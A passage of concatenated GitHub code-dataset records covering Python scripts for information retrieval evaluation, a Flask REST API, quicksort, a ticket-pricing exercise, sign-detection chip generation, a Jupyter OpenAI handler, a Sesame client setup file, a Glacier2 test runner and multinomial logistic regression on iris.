self.preprocess.stopwordremove(doc)\n\t\t\tstopwordRemovedDocs.append(stopwordRemovedDoc)\n\t\tjson.dump(stopwordRemovedDocs, open(self.args.out_folder + \"stopword_removed_docs.txt\", 'w'))\n\n\t\tpreprocessedDocs = stopwordRemovedDocs\n\t\treturn preprocessedDocs\n\n\tdef evaluateDataset(self):\n\t\t\"\"\"\n\t\t- preprocesses the queries and documents, stores in output folder\n\t\t- invokes the IR system\n\t\t- evaluates precision, recall, fscore, nDCG and MAP \n\t\t for all queries in the Cranfield dataset\n\t\t- produces graphs of the evaluation metrics in the output folder\n\t\t\"\"\"\n\t\targs =self.args\n\n\t\t########################## Read queries ##########################\n\n\t\tqueries_json = json.load(open(args.dataset + \"cran_queries.json\", 'r'))[:]\n\t\tquery_ids, queries = [item[\"query number\"] for item in queries_json], \\\n\t\t\t\t\t\t\t\t[item[\"query\"] for item in queries_json]\n\t\t\t\t\t\t\t\t\n\t\t########################## Process queries ########################## \n\n\t\tprocessedQueries = self.preprocessQueries(queries)\n\n\t\t# ########################## Read documents ##########################\n\n\t\tdocs_json = json.load(open(args.dataset + \"cran_docs.json\", 'r'))[:]\n\n\t\t########################## BUILD DATASET FOR LSA ###########################\n\n\t\tif args.method in [\"Wordnet_QE\",\"TFIDF\"]:\n\t\t\tcorpus = get_corpus(corpus=args.corpus)\n\t\t\tprocessed_corpus = self.preprocessDocs(corpus)\n\t\t\tself.informationRetriever.wordnet(args,processed_corpus)\n\n\t\telif args.method == \"LSA\" or args.method == \"Combined\":\t\t\t\n\t\t\tcorpus = get_corpus(corpus=args.corpus)\n\t\t\tprocessed_corpus = self.preprocessDocs(corpus)\n\t\t\tself.informationRetriever.LSA( args, processed_corpus)\n\t\t\t\n\n\t\t########################## Build document index ##########################\n\n\t\tdoc_tfidf, query_tfidf = self.informationRetriever.vectorize_queries(processedQueries)\n\n\t\t###################### Rank the documents for each query ##########################\n\n\t\tself.similarity.find_similarity(doc_tfidf, query_tfidf, method = self.args.method)\n\t\tdoc_IDs_ordered = self.similarity.Rank()\n\n\t\t###################### Read relevance judements ##########################\n\n\t\tqrels = json.load(open(args.dataset + \"cran_qrels.json\", 'r'))[:]\n\n\t\t######## Calculate precision, recall, f-score, MAP and nDCG for k ##########\n\n\t\tprecisions, recalls, fscores, MAPs, nDCGs, x = [], [], [], [], [], []\n\t\t\n\t\tfor k in range(1, 11, 1):\n\t\t\tx.append(k)\n\t\t\tprecision = self.evaluator.meanPrecision(\n\t\t\t\tdoc_IDs_ordered, query_ids, qrels, k)\n\t\t\tprecisions.append(precision)\n\t\t\trecall = self.evaluator.meanRecall(\n\t\t\t\tdoc_IDs_ordered, query_ids, qrels, k)\n\t\t\trecalls.append(recall)\n\t\t\tfscore = self.evaluator.meanFscore(\n\t\t\t\tdoc_IDs_ordered, query_ids, qrels, k)\n\t\t\tfscores.append(fscore)\n\t\t\tMAP = self.evaluator.meanAveragePrecision(\n\t\t\t\tdoc_IDs_ordered, query_ids, qrels, k)\n\t\t\tMAPs.append(MAP)\n\t\t\tnDCG, query_scores = self.evaluator.meanNDCG(\n\t\t\t\tdoc_IDs_ordered, query_ids, qrels, k)\n\t\t\tnDCGs.append(nDCG)\n\t\tprint(\" Following metrics are averaged over k = 1 to 10 \")\n\t\tprint(\" nDCG : \", np.round(np.mean(nDCGs),3), end = \"\\t\")\n\t\tprint(\" MAP : \", np.round(np.mean(MAPs),3), end = \"\\t\")\n\t\tprint(\" Precision : \", np.round(np.mean(precisions),3), end = \"\\t\")\n\t\tprint(\" Recall : \", np.round(np.mean(recalls),3), end = \"\\t\")\n\t\tprint(\" F-score : \",np.round( np.mean(fscores),3), end = \"\\t\")\n\t\tprint(\"\\n For k = 1 \")\n\t\tprint(\" nDCG : \", np.round(nDCGs[0],3), end = \"\\t\")\n\t\tprint(\" MAP : \", np.round(MAPs[0],3), end = \"\\t\")\n\t\tprint(\" Precision : \", np.round(precisions[0],3), end = \"\\t\")\n\t\tprint(\" Recall : \", np.round(recalls[0],3), end = \"\\t\")\n\t\tprint(\" F-score : \",np.round( fscores[0],3)\t)\n\n\t\t############# Plot the metrics and save plot ######################\n\n\t\tplt.plot(x, precisions, label=\"Precision\")\n\t\tplt.plot(x, recalls, label=\"Recall\")\n\t\tplt.plot(x, fscores, label=\"F-Score\")\n\t\tplt.plot(x, MAPs, label=\"MAP\")\n\t\tplt.plot(x, nDCGs, label=\"nDCG\")\n\t\tplt.legend()\n\t\tplt.title(\"Evaluation Metrics - Cranfield Dataset\")\n\t\tplt.xlabel(\"k\")\n\t\tplt.savefig(args.out_folder + \"eval_plot.png\")\n\n\t\treturn [query_scores,doc_IDs_ordered, nDCGs, MAPs, precisions, recalls, fscores]\n\n\n\nif __name__ == \"__main__\":\n\n\tstart_time = time.time()\n\n\t# Create an argument parser\n\tparser = argparse.ArgumentParser(description='main.py')\n\n\t# Tunable parameters as external arguments\n\tparser.add_argument('--dataset', default = DATASET_DIRECTORY, help = \"Path to the dataset folder\")\n\tparser.add_argument('--out_folder', default = \"output/\", help = \"Path to output folder\")\n\tparser.add_argument('--segmenter', default = \"punkt\",help = \"Sentence Segmenter Type [naive|punkt]\")\n\tparser.add_argument('--tokenizer', default = \"ptb\",help = \"Tokenizer Type [naive|ptb]\")\n\tparser.add_argument(\"--corpus\",type = str, default = \"cranfield\", help= \"Corpus used for training\")\n\t#choices = [\"cranfield\",\"20newsgroup\",\"books\"])\n\tparser.add_argument(\"--restrict_tokenization\", type = str2bool, default = False, help = \"Use only isalnum(True) or normal tokenization(False)\")\n\tparser.add_argument(\"--max_dim\", type = int, default = 1000, help = \"Maximum no of cordinates to be used (LSA)\" )\n\tparser.add_argument(\"--max_ngram\", type = int, default = 1, help = \"Maximum limit of Ngram. If 2 countvectorizer contains both unigrams and bigrams\")\n\tparser.add_argument(\"--method\", type = str, default = 'LSA', help = \"Algorithm for IR\", choices =['LSA','Wordnet_QE','Combined','TFIDF'])\n\t# Wordnet_QE => Query expansion based on WordNet\n\t# LSA \t\t => Latent Semantic Analysis\n\t# Combined => Combined LSA + Wordnet_QE\t\n\tparser.add_argument(\"--wordnet_weight\", type = int, default = 1, help = \"Weight of actual word compared to appended words (WordNet_QE)\" )\n\t\n\targs = parser.parse_args()\n\tprint(\"\\nCorpus :\",args.corpus, end = \"\\t\")\n\tprint(\"Restrictin Tokenization : \",args.restrict_tokenization, end = \"\\t\")\n\tprint(\"Maximum dimension : \",args.max_dim, end = \"\\t\")\n\tprint(\"Tokenizer : \",args.tokenizer, end = \"\\t\")\n\tprint(\"Segmenter : \",args.segmenter, end = \"\\t\")\n\tprint(\"Algorithm : \",args.method)\n\n\tif not os.path.exists(args.out_folder):\n\t\tos.mkdir(args.out_folder)\n\n\t# Create an instance of the Search Engine\n\tsearchEngine = SearchEngine(args)\n\n\tsearchEngine.evaluateDataset()\n\n\tprint(\"Total time taken : \",time.time() - start_time)\n\t# Run - python main.py --corpus=cranfield --method=wordnet2 --use_svd=True --restrict_tokenization=False --max_dim=600 --max_ngram=1 --top_n=1\n","repo_name":"kr-hari/Information-Retrieval-using-LSA-and-Query-expansion","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"2290032691","text":"from os.path import basename, splitext\nfrom flask import Blueprint\nfrom flask.ext.restful import Api, marshal_with, Resource\nfrom tabs import api, db\nfrom tabs.database import News, Updates, Users\nfrom tabs.forms import NewsForm, UpdateForm, UserForm\nfrom tabs.serializers import news_fields, update_fields, user_fields\n\n__version__ = splitext(basename(__file__))[0]\nmod = Blueprint('api', __name__, url_prefix='/api/%s' % __version__)\napi = Api(mod)\n\n# NEED TO GENERALIZE THIS STUFF\n\n\n\n# # working?\n# class AddProject(Resource):\n# form = ProjectForm()\n# if not form.validate_on_submit():\n# return form.errors, 422\n\n# project = Projects(form.name.data, form.user_id.data)\n# db.session.add(project)\n# db.session.commit()\n# return ProjectSerializer(project).data\n\n\n# # working?\n# class AddSample(Resource):\n# form = SampleForm()\n# if not form.validate_on_submit():\n# return form.errors, 422\n\n# sample = Samples(form.name.data, project)\n# db.session.add(sample)\n# db.session.commit()\n# return SampleSerializer(sample).data\n\n\n# # working?\n# class AddSequencing(Resource):\n# form = SequengingForm()\n# if not form.validate_on_submit():\n# return form.errors, 422\n\n# sequencing = Sequencing()\n# db.session.add(sequencing)\n# db.session.commit()\n# return SequencingSerializer(sequencing).data\n\n\n# working?\nclass UpdateEndpoint(Resource):\n @marshal_with(update_fields)\n def get(self):\n updates = Updates.query.all()\n return updates\n\n @marshal_with(update_fields)\n def post(self):\n form = UpdateForm()\n if not form.validate_on_submit():\n return form.errors, 422\n\n update = Updates(form.title.data, form.body.data, form.user_id.data)\n db.session.add(update)\n db.session.commit()\n return update\n\n\nclass UserEndpoint(Resource):\n @marshal_with(user_fields)\n def get(self):\n users = Users.query.all()\n return users\n\n @marshal_with(user_fields) \n def post(self):\n form = UserForm()\n if not form.validate_on_submit():\n return form.errors, 422\n\n user = Users(form.name.data, form.email.data)\n db.session.add(user)\n db.session.commit()\n return user\n\n\n# combined?\n# working?\nclass NewsEndpoint(Resource):\n @marshal_with(news_fields)\n def get(self):\n news = News.query.all()\n return news\n\n @marshal_with(news_fields)\n def post(self):\n form = NewsForm()\n if not form.validate_on_submit():\n return form.errors, 422\n\n news = News(form.title.data, form.body.data, form.user_id.data)\n db.session.add(news)\n db.session.commit()\n return news\n\n\napi.add_resource(UserEndpoint, \"/users\")\napi.add_resource(NewsEndpoint, \"/news\")\napi.add_resource(UpdateEndpoint, \"/updates\")\n","repo_name":"keeklund-zz/tabs","sub_path":"tabs/api/v1.py","file_name":"v1.py","file_ext":"py","file_size_in_byte":2876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"70911870473","text":"def quickSort(arr):\r\n \"\"\"Apply quick sort on the given array\r\n\r\n :param arr: the array to sort\r\n :type arr: list\r\n \"\"\"\r\n less = []\r\n pivotList = []\r\n more = []\r\n if len(arr) <= 1:\r\n return arr\r\n else:\r\n pivot = arr[0]\r\n for i in arr:\r\n if i < pivot:\r\n less.append(i)\r\n elif i > pivot:\r\n more.append(i)\r\n else:\r\n pivotList.append(i)\r\n less = quickSort(less)\r\n more = quickSort(more)\r\n return less + pivotList + more\r\n\r\n# Unit test\r\na = [4, 65, 2, -31, 0, 99, 83, 782, 1] # The array to sort\r\na = quickSort(a)\r\nassert all(a[i] <= a[i+1] for i in range(len(a)-1)) # Assert array is sorted\r\n\r\n# Quick sort: Quicksort is a comparison sort, meaning that it can \r\n# sort items of any type for which a \"less-than\" relation is defined. \r\n# In efficient implementations it is not a stable sort, meaning \r\n# that the relative order of equal sort items is not preserved. \r\n# Quicksort can operate in-place on an array, requiring small \r\n# additional amounts of memory to perform the sorting. It is very \r\n# similar to selection sort, except that it does not always choose \r\n# worst-case partition.\r\n","repo_name":"codezoned/ScriptsDump","sub_path":"Arrays-Sorting/src/Quick_sort/quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":143,"dataset":"github-code","pt":"27"} +{"seq_id":"27904215194","text":"\"\"\"Asks the user for height, authorizes or not the sale of the ticket, calculates \nthe value considering age and added a photo and returns the total value of the ticket\"\"\"\n\n# rollercoaster\nprint(\"Welcome to the rollercoaster!\")\n\nheight = int(input(\"What's your height in cm?\\n\"))\nbill = 0\n\n# check minimum height\nif height >= 120:\n print(\"You can ride the rollercoaster!\")\n\n age = int(input(\"What's your age? \"))\n\n # check ticket value\n if age < 12:\n print(\"Child tickets are $5.\")\n bill += 5\n elif age <= 18:\n print(\"Youth tickets are $7.\")\n bill += 7\n elif age >= 45 and age <= 55:\n print(\"Your tickets are $0\")\n else:\n print(\"Adult tickets are $12.\")\n bill += 12\n\n # check if there is a request for a photo\n wants_photo = input(\"Do you have a photo? Y or N: \").upper()\n if wants_photo == \"Y\":\n bill += 3\n\nelse:\n print(\"Sorry, you can't ride the rollercoaster!\")\n\nprint(f'The total of your ticket is ${bill}')\n","repo_name":"rafaelciriello/exercises_100_days_of_code","sub_path":"5_rollercoaster.py","file_name":"5_rollercoaster.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"5190398574","text":"import datetime\nfrom hyperparameter import Hyperparameter\nfrom sample import Sample\nfrom typing import Dict, Iterable, List\n\n\nclass TrainingData:\n \"\"\"Represents TrainingData and methods to load, test and classify it.\"\"\"\n\n def __init__(self, name: str) -> None:\n self.name = name\n self.uploaded: datetime.datetime\n self.tested: datetime.datetime\n self.training: List[Sample] = []\n self.testing: List[Sample] = []\n self.tuning: List[Hyperparameter]\n\n def load(self, raw_data_source: Iterable[Dict[str, str]]) -> None:\n # Instead of opening and reading a file in this method, it is\n # better to abstract it out to not bind the class to a specific\n # file type. In this way details of the file format will be\n # isolated from details of managing the data\n self.uploaded = datetime.datetime.today()\n\n def test(self, hyperparameters: Hyperparameter) -> None:\n hyperparameters.test()\n self.tuning.append(hyperparameters)\n self.tested = datetime.datetime.today()\n\n def classify(self, hyperparameters: Hyperparameter, sample: Sample) -> None:\n classification = hyperparameters.classify(Sample)\n sample.classify(classification)\n return sample\n","repo_name":"Tolga-Karahan/Studies","sub_path":"programming-languages/Python/object-oriented/use-case-implementation/training_data.py","file_name":"training_data.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"20883237366","text":"# -*- coding: utf-8 -*-\n\nimport os, sys\nimport cv2\nimport glob\nimport json\nimport random\nimport numpy as np\nfrom tqdm import tqdm\nfrom operator import add\nimport utils\nimport pdb\n\nrandom.seed(100)\nhome = os.path.expanduser('~')\nroot_datadir = os.path.join(home, 'data/dfsign')\nsrc_traindir = root_datadir + '/train'\nsrc_testdir = root_datadir + '/test'\nsrc_annotation = root_datadir + '/train_label_fix.csv'\n\nold_datadir = root_datadir + '/dfsign_chip_voc'\nold_anno_dir = old_datadir + '/Annotations'\n\ndest_datadir = root_datadir + '/dfsign_detect_voc'\nimage_dir = dest_datadir + '/JPEGImages'\nlist_dir = dest_datadir + '/ImageSets/Main'\nanno_dir = dest_datadir + '/Annotations'\n\nloc_json = os.path.join(old_anno_dir, 'test_chip.json')\ndetect_json = os.path.join(home,\n 'working/dfsign/mmdetection/dfsign/results_chip.json')\n\ndef main():\n if not os.path.exists(dest_datadir):\n os.mkdir(dest_datadir)\n os.mkdir(image_dir)\n os.makedirs(list_dir)\n os.mkdir(anno_dir)\n\n # read chip loc\n with open(loc_json, 'r') as f:\n chip_loc = json.load(f)\n # read chip detections\n with open(detect_json, 'r') as f:\n chip_detect = json.load(f)\n\n dfsign_results = []\n for chip_id, chip_result in chip_detect.items():\n chip_id = os.path.basename(chip_id)\n img_id = chip_id.split('_')[0] + '.jpg'\n\n loc = chip_loc[chip_id]['loc']\n for i, pred_box in enumerate(chip_result['pred_box']):\n # transform to orginal image\n # ratio = (loc[2] - loc[0]) / 416.\n pred_box = [pred_box[0] + loc[0],\n pred_box[1] + loc[1],\n pred_box[2] + loc[0],\n pred_box[3] + loc[1]]\n sign_type = int(chip_result['pred_label'][i])\n score = chip_result['pred_score'][i]\n dfsign_results.append([img_id] + pred_box + [sign_type, score])\n \n filter_results = []\n temp = np.array(dfsign_results)\n detected_img = np.unique(temp[:, 0])\n for img_id in detected_img:\n preds = temp[temp[:, 0] == img_id]\n preds = preds[preds[:, -1].argsort()]\n filter_results.append(list(preds[-1])[:-1])\n\n chip_loc = {}\n chip_name_list = []\n for result in tqdm(filter_results):\n imgid = result[0][:-4]\n\n box = [float(x) for x in result[1:5]]\n box_w = box[2] - box[0]\n box_h = box[3] - box[1]\n\n if max(box_w, box_h) < 25:\n ratio_list = [4.5, 4.8, 5.2, 5.5]\n elif max(box_w, box_h) < 28:\n ratio_list = [4.5, 4.8, 5.2, 5.5] \n elif max(box_w, box_h) < 100:\n ratio_list = [3.5, 3.8, 4.2, 4.5]\n else:\n ratio_list = [3.5, 3.8, 4.2]\n\n chip_list = []\n for ratio in ratio_list:\n region_w = max(box_w, box_h) * ratio\n region_h = region_w\n center_x = box[0] + box_w / 2.0\n center_y = box[1] + box_h / 2.0\n region = [center_x - region_w / 2, \n center_y - region_h / 2,\n center_x + region_w / 2,\n center_y + region_h / 2]\n shift_x = max(0, 0 - region[0]) + min(0, 3200 - 1 - region[2])\n shift_y = max(0, 0 - region[1]) + min(0, 1800 - 1 - region[3])\n chip = [region[0] + shift_x,\n region[1] + shift_y,\n region[2] + shift_x,\n region[3] + shift_y]\n chip = [int(x) for x in chip]\n chip_list.append(chip)\n\n origin_img = cv2.imread(os.path.join(src_testdir, '%s.jpg'%imgid))\n for i, chip in enumerate(chip_list):\n chip_img = origin_img[chip[1]:chip[3], chip[0]:chip[2], :].copy()\n chip_name = '%s_%d' % (imgid, i)\n cv2.imwrite(os.path.join(image_dir, '%s.jpg'%chip_name), chip_img)\n chip_name_list.append(chip_name)\n\n chip_info = {'loc': chip}\n chip_loc[chip_name] = chip_info\n\n # write test txt\n with open(os.path.join(list_dir, 'test.txt'), 'w') as f:\n f.writelines([x+'\\n' for x in chip_name_list])\n print('write txt.')\n\n # write chip loc json\n with open(os.path.join(anno_dir, 'test_chip.json'), 'w') as f:\n json.dump(chip_loc, f)\n print('write json.')\n\nif __name__ == '__main__':\n main()\n","repo_name":"qixuxiang/dfsign","sub_path":"tools/generate_detect_chip.py","file_name":"generate_detect_chip.py","file_ext":"py","file_size_in_byte":4353,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"27"} +{"seq_id":"4709275938","text":"# coding: utf-8\n\n\"\"\"\n Version 3 of CANDY HOUSE’s Sesame API\n\n We use RESTful API to provide basic manipulation of the Sesame smart lock, including: * Get Sesame lock/unlock status * Get battery status * Lock and unlock Sesame * Sync Sesame status * Get results for lock, unlock, and sync commands # noqa: E501\n\n The version of the OpenAPI document: 3.0.0\n Contact: sesame@candyhouse.co\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nfrom setuptools import setup, find_packages # noqa: H301\n\nNAME = \"sesame-client\"\nVERSION = \"1.0.0\"\n# To install the library, run the following\n#\n# python setup.py install\n#\n# prerequisite: setuptools\n# http://pypi.python.org/pypi/setuptools\n\nREQUIRES = [\"urllib3 >= 1.15\", \"six >= 1.10\", \"certifi\", \"python-dateutil\"]\n\nsetup(\n name=NAME,\n version=VERSION,\n description=\"Version 3 of CANDY HOUSE’s Sesame API\",\n author_email=\"sesame@candyhouse.co\",\n url=\"\",\n keywords=[\"OpenAPI\", \"OpenAPI-Generator\", \"Version 3 of CANDY HOUSE’s Sesame API\"],\n install_requires=REQUIRES,\n packages=find_packages(),\n include_package_data=True,\n long_description=\"\"\"\\\n We use RESTful API to provide basic manipulation of the Sesame smart lock, including: * Get Sesame lock/unlock status * Get battery status * Lock and unlock Sesame * Sync Sesame status * Get results for lock, unlock, and sync commands # noqa: E501\n \"\"\"\n)\n","repo_name":"sesame-app/sesame-python-client","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36061427680","text":"from jupyter_server.base.handlers import APIHandler\nfrom jupyter_server.utils import url_path_join\nfrom tornado.escape import json_encode, json_decode\nimport tornado\nimport openai\n\nclass RouteHandler(APIHandler):\n # The following decorator should be present on all verb methods (head, get, post,\n # patch, put, delete, options) to ensure only authorized user can request the\n # Jupyter server\n @tornado.web.authenticated\n def post(self):\n if len(self.request.body) == 0:\n self.set_status(400)\n self.finish(json_encode({ \"message\": \"no body provided\" }))\n return\n\n data = json_decode(self.request.body)\n\n response = openai.Completion.create(\n api_key=data.get(\"api_key\"),\n engine=data.get(\"engine\", \"davinci-codex\"),\n prompt=data.get(\"prompt\", \"\"),\n max_tokens=data.get(\"max_tokens\", 256),\n temperature=data.get(\"temperature\", 0.5),\n stop=data.get(\"stop\", [\"####\"]),\n )\n\n self.finish(json_encode(response))\n\n\ndef setup_handlers(web_app):\n host_pattern = \".*$\"\n\n base_url = web_app.settings[\"base_url\"]\n route_pattern = url_path_join(base_url, \"jupyterlab-codex\", \"completion\")\n handlers = [(route_pattern, RouteHandler)]\n web_app.add_handlers(host_pattern, handlers)\n","repo_name":"lhr0909/jupyterlab-codex","sub_path":"jupyterlab_codex/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","stars":86,"dataset":"github-code","pt":"27"} +{"seq_id":"73875528712","text":"import os, sys\n\npath = [ \".\", \"..\", \"../..\", \"../../..\", \"../../../..\" ]\nhead = os.path.dirname(sys.argv[0])\nif len(head) > 0:\n path = [os.path.join(head, p) for p in path]\npath = [os.path.abspath(p) for p in path if os.path.exists(os.path.join(p, \"scripts\", \"TestUtil.py\")) ]\nif len(path) == 0:\n raise RuntimeError(\"can't find toplevel directory!\")\nsys.path.append(os.path.join(path[0], \"scripts\"))\nimport TestUtil\n\nrouter = TestUtil.getGlacier2Router()\n\nif TestUtil.appverifier:\n TestUtil.setAppVerifierSettings([router])\n\ndef startRouter():\n\n args = ' --Ice.Warn.Dispatch=0' + \\\n ' --Ice.Warn.Connections=0' + \\\n ' --Ice.ThreadPool.Server.Serialize=1' + \\\n ' --Ice.ThreadPool.Client.Serialize=1' + \\\n ' --Glacier2.Filter.Category.Accept=\"c\"' + \\\n ' --Glacier2.SessionTimeout=\"30\"' + \\\n ' --Glacier2.Client.Endpoints=\"default -p 12347\"' + \\\n ' --Glacier2.Server.Endpoints=\"tcp -h 127.0.0.1\"' \\\n ' --Ice.Admin.Endpoints=\"tcp -h 127.0.0.1 -p 12348\"' + \\\n ' --Glacier2.PermissionsVerifier=Glacier2/NullPermissionsVerifier' + \\\n ' --Glacier2.Client.ForwardContext=1' + \\\n ' --Glacier2.Client.Trace.Override=0' + \\\n ' --Glacier2.Client.Trace.Request=0' + \\\n ' --Glacier2.Server.Trace.Override=0' + \\\n ' --Glacier2.Server.Trace.Request=0' + \\\n ' --Ice.Admin.InstanceName=\"Glacier2\"' + \\\n ' --Glacier2.Client.Buffered=1 --Glacier2.Server.Buffered=1' + \\\n ' --Glacier2.Client.SleepTime=50 --Glacier2.Server.SleepTime=50'\n\n sys.stdout.write(\"starting router in buffered mode... \")\n sys.stdout.flush()\n starterProc = TestUtil.startServer(router, args, count=2)\n print(\"ok\")\n return starterProc\n\nname = os.path.join(\"Glacier2\", \"override\")\n\nstarterProc = startRouter()\nTestUtil.clientServerTest(name, additionalClientOptions = \" --shutdown\")\nstarterProc.waitTestSuccess()\n\nif TestUtil.appverifier:\n TestUtil.appVerifierAfterTestEnd([router])\n","repo_name":"hwz121212/zeroc_ice","sub_path":"Ice-3.5.1/demo/test/Glacier2/override/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"34705352955","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import datasets\nfrom sklearn.linear_model import LogisticRegression\nimport math\nimport matplotlib.colors as colors\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom mpl_toolkits import mplot3d\nfrom sklearn import linear_model, datasets\nimport seaborn as sns\nimport itertools\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\nfrom time import time\nfrom mlxtend.data import iris_data\nfrom mlxtend.plotting import plot_decision_regions\nimport matplotlib.pyplot as plt\n\n\n\niris = pd.read_csv('iris.csv')\n\n\nX_data = iris.iloc[:,2:4].values\nY = iris.iloc[:,4].values\nprint(Y.shape)\n\n\n\n\nX0 = np.ones((150,1))\nX = np.append(X_data, X0, axis=1)\n\n\n\na = np.array(X[0:40,:])\nb = np.array(X[50:90,:])\nc = np.array(X[100:140,:])\narray_tuple = (a, b, c)\nX_training = np.vstack(array_tuple)\n\na2 = np.array(Y[0:40])\nb2 = np.array(Y[50:90])\nc2 = np.array(Y[100:140])\narray_tuple2 = (a2, b2, c2)\nY_training = np.vstack(array_tuple2)\n\nd = np.array(X[40:50,:])\ne = np.array(X[90:100,:])\nf = np.array(X[140:150,:])\narray_tuple5 = (d, e, f)\nX_test = np.vstack(array_tuple5)\n\nd2 = np.array(Y[40:50])\ne2 = np.array(Y[90:100])\nf2 = np.array(Y[140:150])\narray_tuple6 = (d2, e2, f2)\nY_test = np.vstack(array_tuple6)\n\n\nt1 = np.append(np.ones((40,1)),np.zeros((80,1)))\nt21 = np.append(np.zeros((40,1)),np.ones((40,1)))\nt2 = np.append(t21,np.zeros((40,1)))\nt3 = np.append(np.zeros((80,1)),np.ones((40,1)))\nprint (t1.shape)\n\n\nT_0 = (t1,t2,t3)\nT = np.column_stack((T_0))\nprint(T.shape)\n\n\n\nW1 = np.zeros((2,1))\nW2 = np.zeros((2,1))\nW3 = np.zeros((2,1))\nb = np.zeros((1,3))\nprint(b)\nWt = np.column_stack(((W1,W2,W3)))\nprint(Wt)\nprint(X_training.shape)\nprint(Wt.shape)\nprint(Wt)\n\n\n\nW = np.row_stack((Wt,b))\nalphaMax = 300\n\n\nclass MultiNumialRegression:\n \n def __init__(self, N_iteration = 8000, thres = 1e-3):\n self.N_iteration = N_iteration\n self.thres = thres\n \n def FittingModel(self, X,Y, batch_size = 32, learningrate = 0.001, random_seed = 4, verbose =False):\n np.random.seed(random_seed)\n self.classes = np.unique(Y)\n self.class_labels = {c:i for i,c in enumerate(self.classes)}\n X = self.Bias(X)\n Y = self.One_Hot_Encoding(Y)\n self.loss = []\n self.weights = np.zeros(shape=(len(self.classes),X.shape[1]))\n self.FittingData(X, Y, batch_size, learningrate, verbose)\n return self\n \n def FittingData(self, X,Y, batch_size, learningrate, verbose):\n i = 0\n while (not self.N_iteration or i < self.N_iteration):\n self.loss.append(self.CrossEntropy(Y, self.Predict1(X)))\n \n idx = np.random.choice(X.shape[0], batch_size)\n \n X_B, Y_B = X[idx], Y[idx]\n error = Y_B - self.Predict1(X_B)\n \n update = (learningrate * np.dot(error.T, X_B))\n self.weights += update\n \n if np.abs(update).max() < self.thres: break\n if i % 1000 == 0 and verbose: \n print(' Training accuracy at {} iteration is {}'.format(i, self.Evaluate(X, Y)))\n i +=1\n \n def RandomWeights(self, row, col):\n return np.zeros(shape=(row,col))\n \n \n def Predict1(self,X):\n value = np.dot(X, self.weights.T).reshape(-1,len(self.classes))\n return self.softmax(value)\n \n def Prediction(self, X):\n return self.Predict1(self.Bias(X))\n \n def PredictClasses(self, X):\n self.probability = self.Prediction(X)\n a = np.vectorize(lambda c: self.classes[c])(np.argmax(self.probability, axis=1))\n return a\n \n def softmax(self, v):\n s = np.exp(v)/ np.sum(np.exp(v),axis=1).reshape(-1,1)\n return s\n \n def Bias(self,X):\n return np.insert(X, 0, 1, axis=1) #add 1 to the columns\n \n def One_Hot_Encoding(self, Y):\n return np.eye(len(self.classes))[np.vectorize(lambda c: self.class_labels[c])(Y).reshape(-1)]\n \n \n def Score(self, X, Y):\n return np.mean(self.PredictClasses(X) == Y)\n \n def CrossEntropy(self, Y, probability):\n return -1 * np.mean(Y * np.log(probability))\n \n def Evaluation(self, X, Y):\n return np.mean(np.argmax(self.Predict1(X), axis=1) == np.argmax(Y, axis=1))\n \n\n\nX,Y = datasets.load_iris(return_X_y=True)\nMNR = MultiNumialRegression()\n\nMNR.FittingModel(X,Y,learningrate=0.001)\nprint(MNR.Score(X, Y))\nplot_CE = plt.figure(figsize=(12,8))\nplt.plot(np.arange(len(MNR.loss)),MNR.loss)\nplt.title(\" Cross Entropy during training\")\nplt.xlabel(\"Number of iterations\")\nplt.ylabel(\"Cross Entropy\")\nplt.show()\n\n\n\niris = datasets.load_iris()\nX = iris.data[:, 2:] # take petal features\nY = iris.target\nMNR = MultiNumialRegression()\n\n# fit the data and Create an instance of MNR\nMNR.FittingModel(X,Y,learningrate=0.001)\n# Plot the decision boundary. \nx_min, x_max = X[:, 0].min() - .5, X[:, 0].max() + .5\ny_min, y_max = X[:, 1].min() - .5, X[:, 1].max() + .5\nMu = .02 # step size \nxx, yy = np.meshgrid(np.arange(x_min, x_max, Mu), np.arange(y_min, y_max, Mu))\nZ = MNR.PredictClasses(np.c_[xx.ravel(), yy.ravel()])\n# Put the result into a color plot\nZ = Z.reshape(xx.shape)\nplt.figure(1, figsize=(7, 5))\nplt.pcolormesh(xx, yy, Z, cmap=plt.cm.Paired)\n# Plot also the training points\nplt.scatter(X[:, 0], X[:, 1], c=Y, edgecolors='k', cmap=plt.cm.Paired)\nplt.xlabel('Petal Length')\nplt.ylabel('Petal Width')\nplt.xlim(xx.min(), xx.max())\nplt.ylim(yy.min(), yy.max())\nplt.xticks(())\nplt.yticks(())\nplt.show()\n\n\n\n# #In code below we have some parameters:\n# Lambda is our learning rate between 0.0 and 1.0\n# epochs (default: 50) Passes over the training dataset.\n# l2 Regularization parameter for L2 regularization. No regularization if l2=0.0.\n# random_seed(default: None) Set random state for shuffling and initializing the weights.\n# function on_hot is return a matrix which each sample in y is represented as a row and each colums represent the class label.\n\n\nclass MNR2(object):\n\n def __init__(self, learningrate=0.001, epochs=50, l2_regula=0.0, batches=1, n_classes=None, random_seed=None):\n\n self.learningrate = learningrate\n self.epochs = epochs\n self.l2_regula = l2_regula\n self.batches = batches\n self.n_classes = n_classes\n self.random_seed = random_seed\n\n def fiting(self, X, 